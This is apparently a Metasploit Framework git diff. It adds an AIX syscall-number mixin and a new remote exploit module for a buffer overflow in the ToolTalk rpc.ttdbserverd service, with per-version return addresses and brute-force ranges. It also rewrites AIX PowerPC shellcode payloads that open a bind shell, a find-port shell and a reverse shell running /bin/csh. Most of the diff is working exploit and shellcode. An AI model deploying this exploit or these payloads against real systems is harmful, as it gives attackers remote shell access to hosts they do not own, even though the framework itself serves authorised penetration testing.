diff --git a/lib/msf/core/auxiliary/report.rb b/lib/msf/core/auxiliary/report.rb index 5233b5ca15..bf28ef02c9 100644 --- a/lib/msf/core/auxiliary/report.rb +++ b/lib/msf/core/auxiliary/report.rb @@ -97,6 +97,11 @@ module Auxiliary::Report report_note(opts) end + def find_note(host, ntype) + return if not db + framework.db.find_note(host, ntype) + end + end end diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index b263493806..42db5bc4d6 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -234,6 +234,15 @@ class DBManager block.call(note) end end + + # + # Find a note matching this host address and note type + # + def find_note(host, ntype) + Note.find_by_ntype(ntype, :include => [:host], + :conditions => ['hosts.address = ?', host]) + end + # # This methods returns a list of all notes in the database diff --git a/lib/msf/core/payload.rb b/lib/msf/core/payload.rb index aa9f44d017..6902529c33 100644 --- a/lib/msf/core/payload.rb +++ b/lib/msf/core/payload.rb @@ -19,6 +19,7 @@ class Payload < Msf::Module require 'msf/core/payload/stager' # Platform specific includes + require 'msf/core/payload/aix' require 'msf/core/payload/bsd' require 'msf/core/payload/linux' require 'msf/core/payload/osx' @@ -563,4 +564,4 @@ protected end -end \ No newline at end of file +end diff --git a/lib/msf/core/payload/aix.rb b/lib/msf/core/payload/aix.rb new file mode 100644 index 0000000000..282f84e251 --- /dev/null +++ b/lib/msf/core/payload/aix.rb @@ -0,0 +1,152 @@ +require 'msf/core' +require 'msf/core/auxiliary' + +### +# +# This class is here to implement advanced features for AIX-based +# payloads. AIX payloads are expected to include this module if +# they want to support these features. +# +### +module Msf::Payload::Aix + + include Msf::Auxiliary::Report + + # + # This mixin is chained within payloads that target the AIX platform. + # It provides special prepends, to support things like chroot and setuid + # and detect AIX version. + # + def initialize(info = {}) + ret = super(info) + + register_options( + [ + Msf::OptString.new('AIX', [ true, 'IBM AIX Version', '6.1.4' ]), + ], Msf::Payload::Aix) + + ret + end + + + # + # Overload the generate() call to prefix our stubs and detect AIX version + # + def generate(*args) + @aix = datastore['AIX'] + + #if not assoc_exploit.nil? + # note = find_note(assoc_exploit.rhost, 'AIX') + + # if not note.nil? + # @aix = note['data'] + # end + #end + + __CAL = 511 + + case @aix + when '6.1.4' + __NR_execve = 7 + __NR_getpeername = 211 + __NR_accept = 237 + __NR_listen = 240 + __NR_bind = 242 + __NR_socket = 243 + __NR_connect = 244 + __NR_close = 278 + __NR_kfcntl = 658 + + when '6.1.3' + __NR_execve = 7 + __NR_getpeername = 205 + __NR_accept = 232 + __NR_listen = 235 + __NR_bind = 237 + __NR_socket = 238 + __NR_connect = 239 + __NR_close = 272 + __NR_kfcntl = 644 + + when '6.1.2' + __NR_execve = 7 + __NR_getpeername = 205 + __NR_accept = 232 + __NR_listen = 235 + __NR_bind = 237 + __NR_socket = 238 + __NR_connect = 239 + __NR_close = 272 + __NR_kfcntl = 635 + + when '6.1.1' + __NR_execve = 7 + __NR_getpeername = 202 + __NR_accept = 229 + __NR_listen = 232 + __NR_bind = 234 + __NR_socket = 235 + __NR_connect = 236 + __NR_close = 269 + __NR_kfcntl = 614 + + when '6.1.0' + __NR_execve = 6 + __NR_getpeername = 203 + __NR_accept = 229 + __NR_listen = 232 + __NR_bind = 234 + __NR_socket = 235 + __NR_connect = 236 + __NR_close = 269 + __NR_kfcntl = 617 + + when '5.3.10', '5.3.9', '5.3.8', '5.3.7' + __NR_execve = 6 + __NR_getpeername = 198 + __NR_accept = 214 + __NR_listen = 215 + __NR_bind = 216 + __NR_socket = 217 + __NR_connect = 218 + __NR_close = 245 + __NR_kfcntl = 493 + + end + + __NC_execve = -(__CAL - __NR_execve) + __NC_getpeername = -(__CAL - __NR_getpeername) + __NC_accept = -(__CAL - __NR_accept) + __NC_listen = -(__CAL - __NR_listen) + __NC_bind = -(__CAL - __NR_bind) + __NC_socket = -(__CAL - __NR_socket) + __NC_connect = -(__CAL - __NR_connect) + __NC_close = -(__CAL - __NR_close) + __NC_kfcntl = -(__CAL - __NR_kfcntl) + + cal = "\x38\x5d" + @cal_execve = cal + [__NC_execve].pack('n') + @cal_getpeername = cal + [__NC_getpeername].pack('n') + @cal_accept = cal + [__NC_accept].pack('n') + @cal_listen = cal + [__NC_listen].pack('n') + @cal_bind = cal + [__NC_bind].pack('n') + @cal_socket = cal + [__NC_socket].pack('n') + @cal_connect = cal + [__NC_connect].pack('n') + @cal_close = cal + [__NC_close].pack('n') + @cal_kfcntl = cal + [__NC_kfcntl].pack('n') + + return '' + end + +protected + attr_accessor :aix + attr_accessor :cal_execve + attr_accessor :cal_getpeername + attr_accessor :cal_accept + attr_accessor :cal_bind + attr_accessor :cal_socket + attr_accessor :cal_connect + attr_accessor :cal_close + attr_accessor :cal_kfcntl + +end diff --git a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb new file mode 100644 index 0000000000..c0afc8be32 --- /dev/null +++ b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb @@ -0,0 +1,287 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::SunRPC + include Msf::Exploit::Brute + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability in _tt_internal_realpath + function of the ToolTalk database server (rpc.ttdbserverd). + }, + 'Author' => + [ + 'Adriano Lima ', + 'Ramon de Carvalho Valle ' + ], + 'Version' => '$Revision$', + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'Targets' => + [ + [ + 'IBM AIX Version 6.1.4', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20099430+4096, + 'Addr1' => 0x2ff1ff50-8192, + 'AIX' => '6.1.4', + 'Payload' => { 'AIX' => '6.1.4' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20099430-8192 }, + 'Stop' => { 'Ret' => 0x20099430+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 6.1.3', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20099280+4096, + 'Addr1' => 0x2ff1ffd0-8192, + 'AIX' => '6.1.3', + 'Payload' => { 'AIX' => '6.1.3' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20099280-8192 }, + 'Stop' => { 'Ret' => 0x20099280+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 6.1.2', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20099280+4096, + 'Addr1' => 0x2ff1ffd0-8192, + 'AIX' => '6.1.2', + 'Payload' => { 'AIX' => '6.1.2' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20099280-8192 }, + 'Stop' => { 'Ret' => 0x20099280+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 6.1.1', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20099280+4096, + 'Addr1' => 0x2ff1ffd0-8192, + 'AIX' => '6.1.1', + 'Payload' => { 'AIX' => '6.1.1' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20099280-8192 }, + 'Stop' => { 'Ret' => 0x20099280+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 6.1.0', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20099280+4096, + 'Addr1' => 0x2ff1ffd0-8192, + 'AIX' => '6.1.0', + 'Payload' => { 'AIX' => '6.1.0' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20099280-8192 }, + 'Stop' => { 'Ret' => 0x20099280+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20096ba0+4096, + 'Addr1' => 0x2ff1ff14-8192, + 'AIX' => '5.3.9', + 'Payload' => { 'AIX' => '5.3.9' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20096ba0-8192 }, + 'Stop' => { 'Ret' => 0x20096ba0+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 5.3.10', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20096bf0+4096, + 'Addr1' => 0x2ff1ff14-8192, + 'AIX' => '5.3.10', + 'Payload' => { 'AIX' => '5.3.10' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20096bf0-8192 }, + 'Stop' => { 'Ret' => 0x20096bf0+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 5.3.9', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20096ba0+4096, + 'Addr1' => 0x2ff1ff14-8192, + 'AIX' => '5.3.9', + 'Payload' => { 'AIX' => '5.3.9' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20096ba0-8192 }, + 'Stop' => { 'Ret' => 0x20096ba0+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 5.3.8', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20096c10+4096, + 'Addr1' => 0x2ff1ff98-8192, + 'AIX' => '5.3.8', + 'Payload' => { 'AIX' => '5.3.8' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20096c10-8192 }, + 'Stop' => { 'Ret' => 0x20096c10+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 5.3.7', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20096c10+4096, + 'Addr1' => 0x2ff1ff98-8192, + 'AIX' => '5.3.7', + 'Payload' => { 'AIX' => '5.3.7' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20096c10-8192 }, + 'Stop' => { 'Ret' => 0x20096c10+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'Debug IBM AIX Version 6.1', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0xaabbccdd, + 'Addr1' => 0xddccbbaa, + 'AIX' => '6.1.4', + 'Payload' => { 'AIX' => '6.1.4' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0xaabbccdd }, + 'Stop' => { 'Ret' => 0xaabbccdd }, + 'Step' => 1024 + } + } + ], + [ + 'Debug IBM AIX Version 5.3', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0xaabbccdd, + 'Addr1' => 0xddccbbaa, + 'AIX' => '5.3.10', + 'Payload' => { 'AIX' => '5.3.10' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0xaabbccdd }, + 'Stop' => { 'Ret' => 0xaabbccdd }, + 'Step' => 1024 + } + } + ], + ], + 'DefaultTarget' => 0)) + + end + + def brute_exploit(brute_target) + begin + print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret']) + + sunrpc_create('tcp', 100083, 1) + + if target['AIX'] =~ /6\./ + buf = "A" + else + buf = "AA" + end + + buf << [target['Addr1']].pack('N') * (1022 + 8) + buf << [brute_target['Ret']].pack('N') * 32 + + if target['AIX'] =~ /6\./ + buf << "AAA" + else + buf << "AA" + end + + buf << "\x7f\xff\xfb\x78" * 1920 + buf << payload.encoded + buf = XDR.encode(buf, 2, 0x78000000, 2, 0x78000000) + + print_status('Sending procedure 15 call message...') + sunrpc_call(15, buf) + + sunrpc_destroy + handler + + rescue Rex::Proto::SunRPC::RPCTimeout + # print_error('RPCTimeout') + rescue EOFError + # print_error('EOFError') + end + end + +end + diff --git a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb index 85ae10e972..93e4b039cd 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'solaris', 'References' => [ - ['URL', 'http://risesecurity.org/advisory/RISE-2008001/'], + ['URL', 'http://risesecurity.org/advisories/RISE-2008001.txt'], ], 'Privileged' => true, 'License' => MSF_LICENSE, @@ -164,4 +164,4 @@ class Metasploit3 < Msf::Exploit::Remote XDR.encode(str, 3, 4, int, 0, 0) end -end \ No newline at end of file +end diff --git a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb index 470ccb0be4..6692f15539 100644 --- a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb @@ -18,6 +18,7 @@ require 'msf/base/sessions/command_shell' module Metasploit3 include Msf::Payload::Single + include Msf::Payload::Aix def initialize(info = {}) super(merge_info(info, @@ -34,62 +35,17 @@ module Metasploit3 { 'Offsets' => { - 'LPORT' => [ 77, 'n' ], + 'LPORT' => [ 82, 'n' ], }, } )) - register_options( - [ - OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]), - ], self.class) end - def generate - case datastore['AIXLEVEL'] - when '4.1.0' - cal_socket = "\x38\x5d\xfe\x58" # cal r2,-424(r29) # - cal_bind = "\x38\x5d\xfe\x57" # cal r2,-425(r29) # - cal_listen = "\x38\x5d\xfe\x56" # cal r2,-426(r29) # - cal_accept = "\x38\x5d\xfe\x54" # cal r2,-428(r29) # - cal_close = "\x38\x5d\xfe\x5f" # cal r2,-417(r29) # - cal_kfcntl = "\x38\x5d\xfe\xd7" # cal r2,-297(r29) # - cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) # - when '4.2.0' - cal_socket = "\x38\x5d\xfe\x5c" # cal r2,-420(r29) # - cal_bind = "\x38\x5d\xfe\x5b" # cal r2,-421(r29) # - cal_listen = "\x38\x5d\xfe\x5a" # cal r2,-422(r29) # - cal_accept = "\x38\x5d\xfe\x59" # cal r2,-423(r29) # - cal_close = "\x38\x5d\xfe\x63" # cal r2,-413(r29) # - cal_kfcntl = "\x38\x5d\xfe\xe8" # cal r2,-280(r29) # - cal_execve = "\x38\x5d\xfe\x03" # cal r2,-509(r29) # - when '4.3.0' - cal_socket = "\x38\x5d\xfe\x6a" # cal r2,-406(r29) # - cal_bind = "\x38\x5d\xfe\x69" # cal r2,-407(r29) # - cal_listen = "\x38\x5d\xfe\x68" # cal r2,-408(r29) # - cal_accept = "\x38\x5d\xfe\x66" # cal r2,-410(r29) # - cal_close = "\x38\x5d\xfe\x72" # cal r2,-398(r29) # - cal_kfcntl = "\x38\x5d\xfe\xfd" # cal r2,-259(r29) # - cal_execve = "\x38\x5d\xfe\x05" # cal r2,-507(r29) # - when '4.3.3' - cal_socket = "\x38\x5d\xfe\x79" # cal r2,-391(r29) # - cal_bind = "\x38\x5d\xfe\x78" # cal r2,-392(r29) # - cal_listen = "\x38\x5d\xfe\x77" # cal r2,-393(r29) # - cal_accept = "\x38\x5d\xfe\x76" # cal r2,-394(r29) # - cal_close = "\x38\x5d\xfe\x83" # cal r2,-381(r29) # - cal_kfcntl = "\x38\x5d\xff\x10" # cal r2,-240(r29) # - cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) # - when '5.3.0' - cal_socket = "\x38\x5d\xfe\x8e" # cal r2,-370(r29) # - cal_bind = "\x38\x5d\xfe\x8d" # cal r2,-371(r29) # - cal_listen = "\x38\x5d\xfe\x8c" # cal r2,-372(r29) # - cal_accept = "\x38\x5d\xfe\x8b" # cal r2,-373(r29) # - cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) # - cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) # - cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) # - end + def generate(*args) + super(*args) - payload = + payload = "\x7f\xff\xfa\x79" +# xor. r31,r31,r31 # "\x40\x82\xff\xfd" +# bnel # "\x7f\xc8\x02\xa6" +# mflr r30 # @@ -104,40 +60,40 @@ module Metasploit3 "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 # "\x38\x9d\xfe\x02" +# cal r4,-510(r29) # "\x38\x7d\xfe\x03" +# cal r3,-509(r29) # - cal_socket + + @cal_socket + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x7c\x7c\x1b\x78" +# mr r28,r3 # "\x38\xbd\xfe\x11" +# cal r5,-495(r29) # "\x3f\x60\xff\x02" +# liu r27,-254 # - "\x63\x7b\x04\xd2" +# oril r27,r27,1234 # + "\x63\x7b\x11\x5c" +# oril r27,r27,4444 # "\x97\xe1\xff\xfc" +# stu r31,-4(r1) # "\x97\x61\xff\xfc" +# stu r27,-4(r1) # "\x7c\x24\x0b\x78" +# mr r4,r1 # - cal_bind + + @cal_bind + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x7c\x84\x22\x78" +# xor r4,r4,r4 # "\x7f\x83\xe3\x78" +# mr r3,r28 # - cal_listen + + @cal_listen + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 # "\x7c\x84\x22\x78" +# xor r4,r4,r4 # "\x7f\x83\xe3\x78" +# mr r3,r28 # - cal_accept + + @cal_accept + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x7c\x7a\x1b\x78" +# mr r26,r3 # "\x3b\x3d\xfe\x03" +# cal r25,-509(r29) # "\x7f\x23\xcb\x78" +# mr r3,r25 # - cal_close + + @cal_close + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x7f\x25\xcb\x78" +# mr r5,r25 # "\x7c\x84\x22\x78" +# xor r4,r4,r4 # "\x7f\x43\xd3\x78" +# mr r3,r26 # - cal_kfcntl + + @cal_kfcntl + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x37\x39\xff\xff" +# ai. r25,r25,-1 # @@ -151,9 +107,9 @@ module Metasploit3 "\x94\xa1\xff\xfc" +# stu r5,-4(r1) # "\x94\x61\xff\xfc" +# stu r3,-4(r1) # "\x7c\x24\x0b\x78" +# mr r4,r1 # - cal_execve + + @cal_execve + "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x20" +# bctr # + "\x4e\x80\x04\x21" +# bctrl # "/bin/csh" end diff --git a/modules/payloads/singles/aix/ppc/shell_find_port.rb b/modules/payloads/singles/aix/ppc/shell_find_port.rb index c1cc8fda54..f8e512affe 100644 --- a/modules/payloads/singles/aix/ppc/shell_find_port.rb +++ b/modules/payloads/singles/aix/ppc/shell_find_port.rb @@ -18,6 +18,7 @@ require 'msf/base/sessions/command_shell' module Metasploit3 include Msf::Payload::Single + include Msf::Payload::Aix def initialize(info = {}) super(merge_info(info, @@ -39,42 +40,12 @@ module Metasploit3 } )) - register_options( - [ - OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]), - ], self.class) end - def generate - case datastore['AIXLEVEL'] - when '4.1.0' - cal_getpeername = "\x38\x5d\xfe\x44" # cal r2,-444(r29) # - cal_close = "\x38\x5d\xfe\x5f" # cal r2,-417(r29) # - cal_kfcntl = "\x38\x5d\xfe\xd7" # cal r2,-297(r29) # - cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) # - when '4.2.0' - cal_getpeername = "\x38\x5d\xfe\x49" # cal r2,-439(r29) # - cal_close = "\x38\x5d\xfe\x63" # cal r2,-413(r29) # - cal_kfcntl = "\x38\x5d\xfe\xe8" # cal r2,-280(r29) # - cal_execve = "\x38\x5d\xfe\x03" # cal r2,-509(r29) # - when '4.3.0' - cal_getpeername = "\x38\x5d\xfe\x56" # cal r2,-426(r29) # - cal_close = "\x38\x5d\xfe\x72" # cal r2,-398(r29) # - cal_kfcntl = "\x38\x5d\xfe\xfd" # cal r2,-259(r29) # - cal_execve = "\x38\x5d\xfe\x05" # cal r2,-507(r29) # - when '4.3.3' - cal_getpeername = "\x38\x5d\xfe\x66" # cal r2,-410(r29) # - cal_close = "\x38\x5d\xfe\x83" # cal r2,-381(r29) # - cal_kfcntl = "\x38\x5d\xff\x10" # cal r2,-240(r29) # - cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) # - when '5.3.0' - cal_getpeername = "\x38\x5d\xfe\x7b" # cal r2,-389(r29) # - cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) # - cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) # - cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) # - end + def generate(*args) + super(*args) - payload = + payload = "\x7f\xff\xfa\x79" +# xor. r31,r31,r31 # "\x40\x82\xff\xfd" +# bnel # "\x7f\xc8\x02\xa6" +# mflr r30 # @@ -96,22 +67,22 @@ module Metasploit3 "\x7f\x65\xdb\x78" +# mr r5,r27 # "\x7f\x84\xe3\x78" +# mr r4,r28 # "\x7f\xe3\xfb\x78" +# mr r3,r31 # - cal_getpeername + + @cal_getpeername + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x3b\x5c\x01\xff" +# cal r26,511(r28) # "\xa3\x5a\xfe\x03" +# lhz r26,-509(r26) # - "\x28\x1a\x04\xd2" +# cmpli 0,r26,1234 # + "\x28\x1a\x11\x5c" +# cmpli 0,r26,4444 # "\x40\x82\xff\xd4" +# bne # "\x3b\x3d\xfe\x03" +# cal r25,-509(r29) # "\x7f\x23\xcb\x78" +# mr r3,r25 # - cal_close + + @cal_close + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x7f\x25\xcb\x78" +# mr r5,r25 # "\x7c\x84\x22\x78" +# xor r4,r4,r4 # "\x7f\xe3\xfb\x78" +# mr r3,r31 # - cal_kfcntl + + @cal_kfcntl + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x37\x39\xff\xff" +# ai. r25,r25,-1 # @@ -125,7 +96,7 @@ module Metasploit3 "\x94\xa1\xff\xfc" +# stu r5,-4(r1) # "\x94\x61\xff\xfc" +# stu r3,-4(r1) # "\x7c\x24\x0b\x78" +# mr r4,r1 # - cal_execve + + @cal_execve + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x20" +# bctr # "/bin/csh" diff --git a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb index 1c2c399876..7b2d217076 100644 --- a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb @@ -18,6 +18,7 @@ require 'msf/base/sessions/command_shell' module Metasploit3 include Msf::Payload::Single + include Msf::Payload::Aix def initialize(info = {}) super(merge_info(info, @@ -40,47 +41,12 @@ module Metasploit3 } )) - register_options( - [ - OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]), - ], self.class) end - def generate - case datastore['AIXLEVEL'] - when '4.1.0' - cal_socket = "\x38\x5d\xfe\x58" # cal r2,-424(r29) # - cal_connect = "\x38\x5d\xfe\x59" # cal r2,-423(r29) # - cal_close = "\x38\x5d\xfe\x5f" # cal r2,-417(r29) # - cal_kfcntl = "\x38\x5d\xfe\xd7" # cal r2,-297(r29) # - cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) # - when '4.2.0' - cal_socket = "\x38\x5d\xfe\x5c" # cal r2,-420(r29) # - cal_connect = "\x38\x5d\xfe\x5d" # cal r2,-419(r29) # - cal_close = "\x38\x5d\xfe\x63" # cal r2,-413(r29) # - cal_kfcntl = "\x38\x5d\xfe\xe8" # cal r2,-280(r29) # - cal_execve = "\x38\x5d\xfe\x03" # cal r2,-509(r29) # - when '4.3.0' - cal_socket = "\x38\x5d\xfe\x6a" # cal r2,-406(r29) # - cal_connect = "\x38\x5d\xfe\x6b" # cal r2,-405(r29) # - cal_close = "\x38\x5d\xfe\x72" # cal r2,-398(r29) # - cal_kfcntl = "\x38\x5d\xfe\xfd" # cal r2,-259(r29) # - cal_execve = "\x38\x5d\xfe\x05" # cal r2,-507(r29) # - when '4.3.3' - cal_socket = "\x38\x5d\xfe\x79" # cal r2,-391(r29) # - cal_connect = "\x38\x5d\xfe\x7a" # cal r2,-390(r29) # - cal_close = "\x38\x5d\xfe\x83" # cal r2,-381(r29) # - cal_kfcntl = "\x38\x5d\xff\x10" # cal r2,-240(r29) # - cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) # - when '5.3.0' - cal_socket = "\x38\x5d\xfe\x8e" # cal r2,-370(r29) # - cal_connect = "\x38\x5d\xfe\x8f" # cal r2,-369(r29) # - cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) # - cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) # - cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) # - end + def generate(*args) + super(*args) - payload = + payload = "\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 # "\x40\x82\xff\xfd" +# bnel # "\x7f\xc8\x02\xa6" +# mflr r30 # @@ -88,7 +54,7 @@ module Metasploit3 "\x3b\xde\xfe\x25" +# cal r30,-475(r30) # "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x20" +# bctr # - "\xff\x02\x04\xd2" +# .long 0xff0204d2 # + "\xff\x02\x11\x5c" +# .long 0xff02115c # "\x7f\x00\x00\x01" +# .long 0x7f000001 # "\x4c\xc6\x33\x42" +# crorc 6,6,6 # "\x44\xff\xff\x02" +# svca 0 # @@ -96,24 +62,24 @@ module Metasploit3 "\x3b\xa0\x01\xff" +# lil r29,511 # "\x38\x9d\xfe\x02" +# cal r4,-510(r29) # "\x38\x7d\xfe\x03" +# cal r3,-509(r29) # - cal_socket + + @cal_socket + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x7c\x7c\x1b\x78" +# mr r28,r3 # "\x38\xbd\xfe\x11" +# cal r5,-495(r29) # "\x38\x9e\xff\xf8" +# cal r4,-8(r30) # - cal_connect + + @cal_connect + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x3b\x7d\xfe\x03" +# cal r27,-509(r29) # "\x7f\x63\xdb\x78" +# mr r3,r27 # - cal_close + + @cal_close + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x7f\x65\xdb\x78" +# mr r5,r27 # "\x7c\x84\x22\x78" +# xor r4,r4,r4 # "\x7f\x83\xe3\x78" +# mr r3,r28 # - cal_kfcntl + + @cal_kfcntl + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x37\x7b\xff\xff" +# ai. r27,r27,-1 # @@ -127,7 +93,7 @@ module Metasploit3 "\x94\xa1\xff\xfc" +# stu r5,-4(r1) # "\x94\x61\xff\xfc" +# stu r3,-4(r1) # "\x7c\x24\x0b\x78" +# mr r4,r1 # - cal_execve + + @cal_execve + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x20" +# bctr # "/bin/csh" diff --git a/modules/payloads/singles/aix/ppc64/shell_bind_tcp.rb b/modules/payloads/singles/aix/ppc64/shell_bind_tcp.rb deleted file mode 100644 index adc2def56a..0000000000 --- a/modules/payloads/singles/aix/ppc64/shell_bind_tcp.rb +++ /dev/null @@ -1,129 +0,0 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - - -require 'msf/core' -require 'msf/core/handler/bind_tcp' -require 'msf/base/sessions/command_shell' - - -module Metasploit3 - - include Msf::Payload::Single - - def initialize(info = {}) - super(merge_info(info, - 'Name' => 'AIX Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', - 'Description' => 'Listen for a connection and spawn a command shell', - 'Author' => 'Ramon de Carvalho Valle ', - 'License' => MSF_LICENSE, - 'Platform' => 'aix', - 'Arch' => ARCH_PPC64, - 'Handler' => Msf::Handler::BindTcp, - 'Session' => Msf::Sessions::CommandShell, - 'Payload' => - { - 'Offsets' => - { - 'LPORT' => [ 77, 'n' ], - }, - } - )) - - register_options( - [ - OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]), - ], self.class) - end - - def generate - case datastore['AIXLEVEL'] - when '5.3.0' - cal_socket = "\x38\x5d\xfe\x8e" # cal r2,-370(r29) # - cal_bind = "\x38\x5d\xfe\x8d" # cal r2,-371(r29) # - cal_listen = "\x38\x5d\xfe\x8c" # cal r2,-372(r29) # - cal_accept = "\x38\x5d\xfe\x8b" # cal r2,-373(r29) # - cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) # - cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) # - cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) # - end - - payload = - "\x7f\xff\xfa\x79" +# xor. r31,r31,r31 # - "\x40\x82\xff\xfd" +# bnel # - "\x7f\xc8\x02\xa6" +# mflr r30 # - "\x3b\xde\x01\xff" +# cal r30,511(r30) # - 